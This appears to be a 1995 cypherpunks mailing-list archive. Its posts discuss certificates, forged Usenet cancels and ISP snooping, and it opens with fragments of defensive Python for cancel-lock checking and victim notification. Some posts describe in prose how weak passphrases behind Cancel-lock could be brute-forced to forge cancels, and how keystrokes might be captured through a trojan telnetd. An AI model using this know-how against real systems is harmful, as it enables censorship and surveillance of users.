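        paths = sorted({h["Path"] for _site, h in items})
        for addr in recipients(*(h for _site, h in items)):
            if sent[addr] >= MAX_PER_ADDRESS:
                continue                 # cap reached: no mailbomb by proxy
            sent[addr] += 1
            notes.append({
                "to": addr,
                "cancelled": target,
                "sites": sorted({site for site, _h in items}),
                "paths": paths,
                "common_tail": common_path_tail(paths),
            })
    return notes


# Constructed sample: three forged cancels naming the same apparent author.
VICTIM = {"From": "Victim <victim@victim.example>",
          "Sender": "news@relay.example",
          "X-Cancelled-By": "victim@victim.example"}
TAIL = "entry.example!forged-host.example!not-for-mail"


def report(site, target, hub):
    path = "!".join((site, hub, TAIL))
    return site, dict(VICTIM, Control="cancel " + target, Path=path)


SAMPLE_REPORTS = [
    report("site-a.example", "<x1@victim.example>", "hub1.example"),
    report("site-b.example", "<x1@victim.example>", "hub2.example"),
    report("site-c.example", "<x1@victim.example>", "hub1.example"),
    report("site-a.example", "<x2@victim.example>", "hub1.example"),
    report("site-a.example", "<x3@victim.example>", "hub1.example"),
]

if __name__ == "__main__":
    for note in build_notifications(SAMPLE_REPORTS):
        print(note["to"], note["cancelled"], "!".join(note["common_tail"]))
```
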




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 5 Oct 95 08:40:24 PDT
To: cypherpunks@toad.com
Subject: Certificates, Attributes, Web of Trust
Message-ID: <199510051540.IAA23596@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl and I and others have been discussing whether the Web of Trust
ought to use certificates to tie keys to people or attributes.
It's taken a while to sink in, but I now think he's basically right :-) ;
on the other hand, it can also still be done using the ugly X.509 format.
This means that we can begin to go out and corrupt users who might otherwise
want Driver's Licenses for the Infotainment Superhighway into realizing
that the Net can give them _more_ privacy instead of less.

>Alternatively, I can have First Security Bank open account 01732 for me and
>create a certificate binding my public key to that account number.  Now, I
>can use that key to sign anonymous checks.  (The bank knows me, perhaps,
>but the payee doesn't need to.)  

Yeah.  Consider a slightly-abused Distinguished Name for a checking or
credit card.
/Account=01732/Type=Checking/Org=FooBank/Country=com/ with key aaa
signed  /Title=Accountsigner/Org=FooBank/Country=com/ with key bbb
        signed  /Title=MasterKey/Org=FooBank/Country=Com/ with key mmm
                signed  /OU=Corporate/O=Verisign/Country=com/ with key vvv

When you sign a check/credit card today, your name and signature are there
as vague verification for the payee and bank that it's authentic; with digital
signatures, the fact that you can sign a note saying "Pay $X to $Y Signed aaa"
is all the verification they need, though the name business makes it easier
for them to find what attributes the signer had and how to get the actual
money...
Even the account number could be the public key instead, but that's pretty long.
(Credit cards may be a slight wrinkle, since there are lots of laws about them.)

What the name also gives you is a handle to hang marketing data on.  Sometimes,
you may have that data from the transaction (card cccccc wanted 5 plutonium
widgets sent to Resident, 1600 Penn.Ave, WashDC 20017), sometimes you've got
less (card cccccc wants to receive results of a stock search at IP address
199.35.212.164, which is way less since that's just a Netcom port server :-)

So a credit card or checking account with just an account number and key
gives you _far_ more privacy than a current conventional one - even if it's
not the full mathematically subpoena-proof privacy that Chaumian digicash
could give.

And if your bank wants to offer extra privacy, it can let you create
sub-accounts - send a request for "Create Sub-account Key SSS Account AAA
Parameters p1,p2,p3" signed aaa, and it sends you a new certificate
/Account=NewUnique#/etc. with key SSS signed by bbb.
So you can give everybody a different-looking check, at least if the cost is
low.

[> Key signing "I use this name" vs. names not being able to sign "I use this key"]
I still think you often want both directions, especially for privacy.
(For authentication, anybody who's got the attribute you want or claim will
often do; for privacy, you really want to identify the _person_ you're talking
to, so the attribute "where the _real_ Carl Ellison gets his mail" is important.
Pseudonyms have an easier time of this, as long as they start using their keys
at the same time as their names.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 5 Oct 95 08:40:36 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <199510051540.IAA23612@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 10/4/95 EDT, dlv@bwalk.dm.com (Dr. Dimitri Vulis) wrote:
>When an article is posted, two quantities are computed by the posting program:
>M1 = H(article body + newsgroups + message-id + date + passphrase) and
>M2 = H(M1). The posted article contains the header "Cancel-lock: M2".
>[.. Cancel-key: M1 to cancel or supersede.]
>[..Daemons forward suspected forged cancels to originator]

Aside from the forged-From:-bogus-cancel spam /r$ proposed, this has
the problem that it still only allows the originator to cancel a message,
and not either the moderator of a moderated group or a Good Spam-canceller
like CancelMoose, as well as stopping censors and cancel-spammers.

Cancellation is a sufficiently local-policy-dependent issue, and reasonably
low volume compared to the rest of news, that it probably makes sense for
the various news programs to hand cancellation requests off to an external
program, which can be locally modified as desired.

One approach is to add digital signature and verification capability
to News, at least to support cancels; doing this in an outboard
cancel-daemon is obviously easier.  RIPEM-SIG is a signature-only
version of RIPEM which is exportable, probably just in binaries. 
The local cancel-daemon could accept cancellation requests that were signed
by anybody on the list of locally-approved cancellers; one site could accept
cancels from Cancelmoose, newsgroup moderators, and Helena Kobrin;
another could do authors only.  This would, of course, encourage people
to get their digital signatures out there to allow themselves to cancel
their own messages.


----------------
BTW, on the general topic of spam, I got a nice note back from the
Johnson-Grace folks saying they were sorry they posted their
ad/announcement to the list and it won't happen again.
And you can download their compression stuff from www.jgc.com but they're
not actually making the algorithms public...
-----

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
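
An outboard cancel check of the kind suggested above, as an added example (not code from the thread or from any news server): it tests a Cancel-key against a Cancel-lock under the original rule M2 = H(M1) and under the message-id-bound rule M2 = H(X + M1) proposed earlier in the thread, and shows that a key observed in one cancel stops working for a second article that carries the same lock value. The NUL field separator, the dict representation of headers and all sample values are assumptions.

```python
import hashlib
import hmac


def H(data: bytes) -> str:
    """Hash for locks and keys. MD5 only because the thread names it."""
    return hashlib.md5(data).hexdigest()


def make_key(body, newsgroups, message_id, date, passphrase):
    """M1 = H(article body + newsgroups + message-id + date + passphrase)."""
    # Assumption: fields are joined with NUL bytes; the thread only writes "+".
    fields = (body, newsgroups, message_id, date, passphrase)
    return H(b"\0".join(f.encode() for f in fields))


def lock_original(m1):
    """Original proposal: M2 = H(M1). The mapping is the same for every article."""
    return H(m1.encode())


def lock_bound(message_id, m1):
    """Proposed fix: M2 = H(X + M1), with X the article's own message-id."""
    return H(message_id.encode() + b"\0" + m1.encode())


def check_cancel(article, cancel, bound):
    """Return 'honor' or 'unauthenticated' for one cancel control message.

    'unauthenticated' covers a missing Cancel-lock, a missing Cancel-key, a
    Control: line naming another article, and a key that does not hash to the
    lock. Under the scheme in the thread such cancels are not honored and are
    forwarded to a collection center.
    """
    lock = article.get("Cancel-lock")
    key = cancel.get("Cancel-key")
    if lock is None or key is None:
        return "unauthenticated"
    if cancel.get("Control") != "cancel " + article["Message-ID"]:
        return "unauthenticated"
    if bound:
        expected = lock_bound(article["Message-ID"], key)
    else:
        expected = lock_original(key)
    ok = hmac.compare_digest(expected.encode(), lock.encode())
    return "honor" if ok else "unauthenticated"


def demo():
    """Run the same three cancels under both rules; all values are constructed."""
    mid_a = "<a1@poster.example>"
    mid_b = "<b2@poster.example>"
    m1 = make_key("body of article A\n", "alt.test", mid_a,
                  "Thu, 5 Oct 95 08:00:00 GMT", "a long constructed passphrase")
    results = {}
    for bound in (False, True):
        lock_a = lock_bound(mid_a, m1) if bound else lock_original(m1)
        article_a = {"Message-ID": mid_a, "Cancel-lock": lock_a}
        # Article B was posted carrying the same lock value as article A.
        article_b = {"Message-ID": mid_b, "Cancel-lock": lock_a}
        genuine = {"Control": "cancel " + mid_a, "Cancel-key": m1}
        # The key from the genuine cancel, seen in control, reused against B.
        reused = {"Control": "cancel " + mid_b, "Cancel-key": m1}
        keyless = {"Control": "cancel " + mid_a}
        results[bound] = (check_cancel(article_a, genuine, bound),
                          check_cancel(article_b, reused, bound),
                          check_cancel(article_a, keyless, bound))
    return results


if __name__ == "__main__":
    for bound, outcome in demo().items():
        print("message-id bound" if bound else "original", outcome)
```
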





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Oct 95 05:54:41 PDT
To: cypherpunks@toad.com
Subject: $BN_air
Message-ID: <199510051254.IAA24947@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-5-95. FTPeach:


   "A David and Goliath fight, the battle between Netscape and
   Microsoft over software for the Internet."

      For all of his success in outwitting the likes of IBM to
      become the leader of the world's biggest software
      company, Bill Gates has long said that the competition
      he most feared would come from a software start-up with
      breakthrough, innovative technology. Netscape
      Communications may be such a company. But a war over
      technology standards, which could delay the progress of
      electronic commerce and potentially impede Netscape's
      growth, now seems inevitable. Netscape's hand has been
      weakened by recent incidents in which flaws in the
      security features of its browser software were
      discovered by two "cyberpunks" [sic].


   $BN_air  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Oct 95 05:55:53 PDT
To: cypherpunks@toad.com
Subject: xus_ORN
Message-ID: <199510051255.IAA25049@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-5-95. Wash Rag:


   "Congress Debates Adding Smaller Spy Satellites to NRO's
   Menu."

      Top members of the House and Senate intelligence
      committees are carrying on a behind-the-scenes debate
      over the nation's spy satellite system, with one group
      arguing that the government could save hundreds of
      millions of dollars by building a new generation of
      small satellites to be launched in place of some of the
      big ones already planned. The Combest group wants to
      start production now of 2,000-pound space vehicles, each
      costing about $100 million and nicknamed "small-sats."


   "$1.6 Billion in NRO Kitty Helped Appropriators Fund Pet
   Projects."

      On the morning of Sept. 21, security men bustled around
      Room H-140 on the first floor of the Capitol, sweeping
      it to ensure that the space was free of electronic
      eavesdropping devices. This year's session turned out to
      be different from any in recent memory. The conferees
      took more than $1 billion from the once-sacrosanct spy
      satellite program of the National Reconnaissance Office
      (NRO) to help make room in the budget to speed up
      purchases of hundreds of millions of dollars worth of
      big-ticket defense items, including the B-2 "stealth"
      bomber.


   xus_ORN  (17 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 5 Oct 95 09:18:36 PDT
To: gerdw@cougar.vut.edu.au (David Gerard)
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <199510051618.JAA26781@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:11 PM 10/5/95 +1000, you wrote:
>One thing that occurs to me: suppose I go to control, collect cancel messages,
>and build myself a collection of M1's that will work with a given M2?

MD5 produces a very random 128-bit output; you're not going to collect
any appreciable fraction of the 2**128 possible M2s.  As long as M1 is
even as simple as MD5(messageid,passphrase), it's pretty open territory.

Targeted attacks, however, are still possible, as long as M1 retains
the form MD5(known-stuff, passphrase) - assuming the user uses one of the
few hundred million wimpiest passphrases, you can search that moderately fast;
if you're willing to burn some resources, you might be able to take out
most of alt.religion.spam, at least until people use better passphrases.

The amount of work depends somewhat on whether you use
MD5(known-stuff, passphrase) or MD5(passphrase,known-stuff).
For the first case, the cracker would calculate the MD5 context
after doing known-stuff (once) and then grind away on passphrases.
For the second, the cracker could pre-compute a table of MD5 context
for the wimpy password list, and then add known-stuff to each.
Since known-stuff is probably longer than passphrases here,
the latter is probably more secure for this application.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 5 Oct 95 09:26:42 PDT
To: cypherpunks@toad.com
Subject: Rethinking the utility of netnews "cancel" control messages
Message-ID: <v02110103ac99b201cba4@[204.179.132.4]>
MIME-Version: 1.0
Content-Type: text/plain


The day of unauthenticated netnews control messages of any kind is
basically over. We gotta:

1. turn off all automated system-wide control of netnews, or

2. properly authenticate all such messages (newgroup, rmgroup, cancel, etc.).

I think we also ought to think carefully about continuing to have a
"cancel" control message (and the Supersedes: header) any more,
authenticated or not - as useful as this mechanism occasionally is to
remove unsightly spams (and other Officially Troublesome Material), isn't
this kind of casual revisionism something that is, historically, to be
avoided?

If you had a netnews system which simply marked a message as cancelled in
some way, would you set your netnews reader to seek out cancelled messages?
Or ignore them?

If you were a librarian or historian operating The Official USENET Archive
of Everything, would you accept and process cancel control messages?

        "Backbone cabal? What's that?"

        Erik Fair <fair@noc.use.net>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Rollins <trollins@hns.com>
Date: Thu, 5 Oct 95 07:19:18 PDT
To: doug@ss7.digex.net
Subject: Re: Oct 14 meeting Agenda? (DC Cypherpunks)
Message-ID: <199510051418.KAA00604@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


>>I figure that as long as we are going to receive...
>>       ? a commercial message from Digex ?
>>
>>We might be able to tap their knowledge base in assessing
>>the various risks and rewards available by using a Commercial
>>ISP.
>>
>>After all, with the FBI and Scientologists waging war on
>>the Internet ( capturing keystrokes, seizing computers,
>>and rummaging through everyone's E-mail ), There may be a
>>way to make life a little more interesting for them.

>I will be glad to send in my two cents worth - I am not sure that
>I understand the question though.

While I believe in strong crypto for everyone (what cypherpunk doesn't),
I also believe that much can be done to prevent the wholesale snooping
of Commercial ISP customers' data.  I believe that this data is snooped
because the ISPs and large number of customers (ignorant of security)
make this data too easy a target (cost effective).

While the NSA may follow its motto (In GOD we trust, the rest we monitor),
others may take hostile actions against someone whose password or
personal information has been obtained. (ex. drain bank account, or just
send spam)

Some questions that I would like to ask...

1 - Assuming that someone from an agency or someone pretending to
    be from an agency wanted to capture one or all the ISP customers
    key presses.  What method would they use ?

    Would they capture the data at the phone company?
    Would they tap the raw data stream at the initial ISP router ?
    Would they route IP packets from the initial ISP router through their
        own equipment before arriving at the ISP machine running the shell
        account ?
    Would they use a Trojan Shell (or telnetd) on a shell account ?
    Would they inform the ISP and get his help or root access ?

2 - What methods could be put into place by the ISP or its customers
    to help prevent this snooping activity ?

    Perhaps an alternative login method (like deslogin or idealogin)
        trying to protect data through the phone company and IP route
        to the target machine.
    Perhaps having a crypto checksum on the shell (telnetd) to detect
        trojan software.
    Perhaps sendmail could public key encrypt mail on its way to the
        customer's directory.
    Perhaps just raising the customer awareness of security issues
        and methods at the ISP.  This could affect the mainstream
        user (joe sixpack) as well as the PGP user.
    Perhaps ISPs could offer a data archive service/site (foreign site)
        where data in the form of PGP encrypted E-mail can be saved and
        retrieved via a robot (something like majordomo).  That way,
        if your home computer breaks, burns, is stolen, or seized. You
        can still retrieve your data at a later time.

Granted these methods do not prevent a determined attacker from squashing
an ISP customer.  However, it does raise the cost of the effort to single
out a user and attack him rather than grab cleartext from everyone.

-tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 5 Oct 95 10:19:05 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <v02110105ac99c03922dd@[204.179.132.4]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:50 10/5/95, Rich Salz wrote:
>Cancel/Supersede is a useful model -- architecting them out of Usenet
>is a very bad idea.  Ask Clarinet.

Is it? The principal effect of not having the mechanism is a slightly
higher disk storage requirement for netnews - something completely unheard
of in the annals of USENET.

The downsides of having the mechanism (especially unauthenticated) we see
now: official and unofficial squelching of articles that someone doesn't
like for whatever arbitrary or situational reason.

In the long run, which is the more detrimental effect? It isn't desirable
for systems to be perfectly efficient, if they generate imperfect results;
as I understand it, the ponderousness of our federal legislative system was
designed in for precisely this reason: they were optimizing for long term
correctness, instead of efficiency.

Frankly, I think that if the question were posed correctly, I'm sure that
Brad Templeton (President of Clarinet) would think carefully about
answering it, since it has quite a few aspects.

I'm just trying to stimulate a little more careful thought about this as a
philosophical issue, before you go whack on INN again...

Erik Fair







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Rollins <trollins@hns.com>
Date: Thu, 5 Oct 95 07:25:21 PDT
To: cypherpunks@toad.com
Subject: Re: Oct 14 meeting Agenda ? (DC Cypherpunks)
Message-ID: <199510051425.KAA00813@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


> >>I figure that as long as we are going to receive...
> >>       ? a commercial message from Digex ?
> >>
> >>We might be able to tap their knowledge base in assessing
> >>the various risks and rewards available by using a Commercial
> >>ISP.
> >>
> >>After all, with the FBI and Scientologists waging war on
> >>the Internet ( capturing keystrokes, seizing computers,
> >>and rummaging through everyone's E-mail ), There may be a
> >>way to make life a little more interesting for them.
> 
> >I will be glad to send in my two cents worth - I am not sure that
> >I understand the question though.
> 
> While I believe in strong crypto for everyone (what cypherpunk doesn't),
> I also believe that much can be done to prevent the wholesale snooping
> of Commercial ISP customers' data.  I believe that this data is snooped
> because the ISPs and large number of customers (ignorant of security)
> make this data too easy a target (cost effective).
> 
> While the NSA may follow its motto (In GOD we trust, the rest we monitor),
> others may take hostile actions against someone whose password or
> personal information has been obtained. (ex. drain bank account, or just
> send spam)
> 
> Some questions that I would like to ask...
> 
> 1 - Assuming that someone from an agency or someone pretending to
>     be from an agency wanted to capture one or all the ISP customers
>     key presses.  What method would they use ?
> 
>     Would they capture the data at the phone company?
>     Would they tap the raw data stream at the initial ISP router ?
>     Would they route IP packets from the initial ISP router through their
>         own equipment before arriving at the ISP machine running the shell
>         account ?
>     Would they use a Trojan Shell (or telnetd) on a shell account ?
>     Would they inform the ISP and get his help or root access ?
> 
> 2 - What methods could be put into place by the ISP or its customers
>     to help prevent this snooping activity ?
> 
>     Perhaps an alternative login method (like deslogin or idealogin)
>         trying to protect data through the phone company and IP route
>         to the target machine.
>     Perhaps having a crypto checksum on the shell (telnetd) to detect
>         trojan software.
>     Perhaps sendmail could public key encrypt mail on its way to the
>         customer's directory.
>     Perhaps just raising the customer awareness of security issues
>         and methods at the ISP.  This could affect the mainstream
>         user (joe sixpack) as well as the PGP user.
>     Perhaps ISPs could offer a data archive service/site (foreign site)
>         where data in the form of PGP encrypted E-mail can be saved and
>         retrieved via a robot (something like majordomo).  That way,
>         if your home computer breaks, burns, is stolen, or seized. You
>         can still retrieve your data at a later time.
> 
> Granted these methods do not prevent a determined attacker from squashing
> an ISP customer.  However, it does raise the cost of the effort to single
> out a user and attack him rather than grab cleartext from everyone.
> 
> -tom
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Oct 95 10:29:47 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
Message-ID: <ac9961b42202100433c4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I have often said "You are your key." That is, keys have priority over
names, even True Names. The biometric True Name identity of a person
holding a key is only _another attribute_ of the key. Maybe important,
maybe not. It depends on the nature of the transaction.

But I go further: a huge number of interesting applications of strong
crypto have no connections at all with physical persons, let alone with
True Names. Agents in computer transactions, applets fired across networks,
agoric entities in computational ecologies, BlackNet sorts of markets, and
on and on.

The notion that a cryptographic key needs to be tied to a physical person
is deeply flawed.

The talk of certification authorities is OK, so long as the practice is
_completely_  and "strongly" voluntary (*).

(* I think maybe we need a term like "strongly voluntary," to parallel
"strong crypto." A key escrow system which can have arbitrary escrow
holders--company lawyers, grandmothers, computers in other buildings,
etc.--is "strongly voluntary." A government-sanctioned program which
authorizes, approves, regulates, and controls escrow holders is *not*. GAK
is not strongly voluntary, even though it will be sold as a "voluntary"
system.)


--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 5 Oct 95 09:07:21 PDT
To: gerdw@cougar.vut.edu.au (David Gerard)
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <9510051606.AA02119@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  One thing that occurs to me: suppose I go to control, collect cancel
>  messages, and build myself a collection of M1's that will work with
>  a given M2?
>
>  That is, I can't actually invert the hashing function. But if a
>  given hash function is standard, then I can eventually build up a
>  collection of M1s for M2s that will let me cancel quite a few things
>  I may want to.  How many cancel messages come through in a day?

You would have to collect quite a few cancels just to get one pair of valid  
hashes for a message you want to cancel...  You don't even need to collect  
cancels from control; you could just start hashing 128-bit strings until you  
got one that hashed to M2.  The catch is you would have to hash on the order  
of 2^64 strings for MD5, for instance.  That's a lot of hashing to cancel one  
article...  It's likely going to be much less work to try to guess the  
passphrase used to generate M1.  There is also a better than average chance  
that the target used the same passphrase to lock multiple posts...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 5 Oct 95 11:35:17 PDT
To: cypherpunks
Subject: Re: Restrictions on Munitions _Imports_
In-Reply-To: <199510050659.XAA04557@comsec.com>
Message-ID: <9510051835.AA19648@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger--Case Western Reserve University Law School--said:
> There is a United States Munitions List for imports that is
> administered by the Treasury Department, but cryptographic devices and
> software are not included on that list.

I agree with Peter.  I looked this up at one point.

The government has considered trying to impose import controls on
crypto, like they've considered every other option they could think
of.  The question is what it would buy them except more trouble from
the public.  NSA can't sustain a claim that it would help them, since
they aren't supposed to be spying on Americans anyway.  But in
Clipper-II, NSA risks effective export controls to advance FBI
wiretapping interests.  Now that NSA is fully naked in bed with the
FBI, they could jointly claim some governmental interest in killing
off domestic privacy.  But that's what would land them in trouble with
the public.

I really think they would have done better to have just shut up about
crypto and not pushed the issue.  The more they tighten the screws,
the more agitated and educated the public gets.  For every Clipper
chip that has sold to a non-governmental party, ten Cypherpunks or
'punk sympathizers have risen up and started writing code,
investigating, talking to their friends, publishing articles in the
press, and filing lawsuits.

Ten years ago it was pretty lonely to be a cryptographer.  Most of us
wouldn't be on this mailing list -- the list itself would probably not
exist -- if the government had just quietly let the export criteria
advance, year after year, and had let the quaint academics play with
their toys.  But they tried alternating between stonewalling us and
forcing crap down our throats.  The result has been that the public
now *cares* about crypto policy.  And the public will get what it
wants, in the long run, no matter what the impact on the privileges of
the current crop of bureaucrats.

	John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 5 Oct 95 12:01:48 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: subjective names and MITM
Message-ID: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Neither certification hierarchies nor the PGP web-of-trust are very useful
because they try to bind True Names to keys and True Names have many
problems.  People can have duplicate names and can change their names
(what happens if I legally change my name to Bill Clinton and try to get
Verisign to certify my key under that name?), and often we don't care
about someone's True Name. 

Perhaps it is better to think of names as subjective identifiers, and
public keys as global ids.  That is, a person who has a collection of
public keys gives each of them a name, but different people can name their
keys differently.  Of course the holder of the corresponding private key
can help in the naming process (e.g., "Please call me Wei").  If two
people need to talk about a third party, they can refer to him by an
arbitrary name after establishing a common binding between his key and
that name. 

In this scheme, the man-in-the-middle problem goes away because you are 
no longer trying to communicate with a True Name, whose binding with a 
key can be spoofed, but rather with the key itself.  If the holder of 
that key chooses to act as a middle-man by relaying messages around, that 
is his business, and there is really nothing you can do about it.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 5 Oct 95 12:15:15 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
In-Reply-To: <ac9961b42202100433c4@[205.199.118.202]>
Message-ID: <30742DE1.588@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> I have often said "You are your key." That is, keys have priority over
> names, even True Names. The biometric True Name identity of a person
> holding a key is only _another attribute_ of the key. Maybe important,
> maybe not. It depends on the nature of the transaction.
> 
> But I go further: a huge number of interesting applications of strong
> crypto have no connections at all with physical persons, let alone with
> True Names. Agents in computer transactions, applets fired across networks,
> agoric entities in computational ecologies, BlackNet sorts of markets, and
> on and on.
> 
> The notion that a cryptographic key needs to be tied to a physical person
> is deeply flawed.
> 
> The talk of certification authorities is OK, so long as the practice is
> _completely_  and "strongly" voluntary (*).

  How about if the system allows you to get a certificate that
has any name in it that you want, where the issuer makes no
claims about the identity of the owner of the certificate?
How about if the software lets the user decide which CAs they
will accept certificates from?  Given these two features,
would you still consider requiring a certificate to be bad?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 5 Oct 95 12:14:32 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <v02110108ac99decdf8f0@[204.179.132.4]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:34 10/5/95, Rich Salz wrote:
>I would like to put my corporate legal infrastructure on an internal secure
>conferencing system.  News (with crypto-signed articles) is ideal.
>Without a "destroy all copies" concept I cannot do this.
>        /r$

This, presumably, is a lawyer, discovery, lawsuit thing, right?

Erik







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 12:25:49 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510051924.MAA25839@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

(...WAY behind in cypherpunks mail...)

Carl Ellison <cme@TIS.COM> writes:
>Let me propose an alternative unique name: the public key (or a good hash
>of it).  The public key has an advantage over both X.509 and PGP names.
>The binding between it and its human being is testable.  You can challenge
>the human in question to sign something.

I don't understand this whole discussion.  A certificate is a signed
binding of a key and a unique name, right?  If the proposal here is
that the unique name be a hash of the key, you are suggesting a signed
binding of a key with its hash!  What is the point of a certificate
which binds a key to its hash?  What is such a certificate asserting?
It seems to be saying nothing at all.  Anybody can already tell if a
hash is right, for all the good that does you.  It's like a notarized
statement that 2+2=4.  I don't see the point.  As Carl goes on to say:

>Assuming you use a public key as the unique name, you end up with a much
>simplified certificate.  In fact, the notion of "certificate" may go away,
>in the sense that the certificate binds a key to a person through a unique
>name.  The person binds himself to his key, on challenge (or on any message
>signature).

If in fact this is just a suggestion that we not have certificates, that
may have some value.  But as a literal suggestion that certificates bind
a key hash to a key, that just doesn't make sense to me.

The thing to keep in mind is, why do we want certificates?  Why not just
use unsigned keys?  If I encrypt a message for Carl based on some key I
found lying around somewhere which someone told me is his, and I send it
to his mailbox, and I get a reply back, how secure is that?  We all know
that you don't get the full security of the encryption if you do this.
Man in the middle attacks might not be easy to do in such a situation but
they are certainly possible.  It is such attacks that certificates (including
PGP key signatures) are designed to prevent.

I'd like to see some grounding of this discussion in terms of the role of
certificates, and ways to prevent man in the middle attacks.  I certainly
have no love for fascist worldwide ID cards and hierarchical, organization
based naming schemes, but just using any old key because it seems to work
OK most of the time isn't going to fly IMO.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMHQw5BnMLJtOy9MBAQEDFQIAxvq8EC5zBMvUYGjwMUb2LDy/kt0gP19Z
S8BY+fxswuQCIqyet6WqddtVNyBE6QlO7XTTOX5RtZvMLHLN0YVp3A==
=Bq7+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Philipp <adam@rosa.com>
Date: Thu, 5 Oct 95 12:51:49 PDT
To: cypherpunks@toad.com
Subject: AEgis Windoze PGP Shell (with location...sorry)
Message-ID: <9510051951.AA22108@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Aegis can be reached at:

http://iquest.com/~aegisrc/


sorry for leaving that out last time....

    -Adam


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMHOOA2/ZTaRmpgTFAQFioQf/WYR7o5SACijZpdZ1XZHtP4X/BXprVkVV
/GX/eB8jbkDaCffuIWoz34dxN5PpSXQPAbE53ZGcJEiIuYdl9CLloJj12yZFS3Bx
wa0988Fz374xmgL2VA6HllQwTBjab7v6vk565RG+Rtf7t7DWGIORP5WFDbDKJ4FR
yhxnPhFi/LA20aBrBjY9bfPMuFdUm+teBVjzNsgGmsTQov72iosuMh0IYhqcaBpR
ndaRdpp1ntcD6A2xPn+wfEYLcLUR34YbJVHmYwN3WJuhbNbhS4x4Aa0KFE9Sbi5W
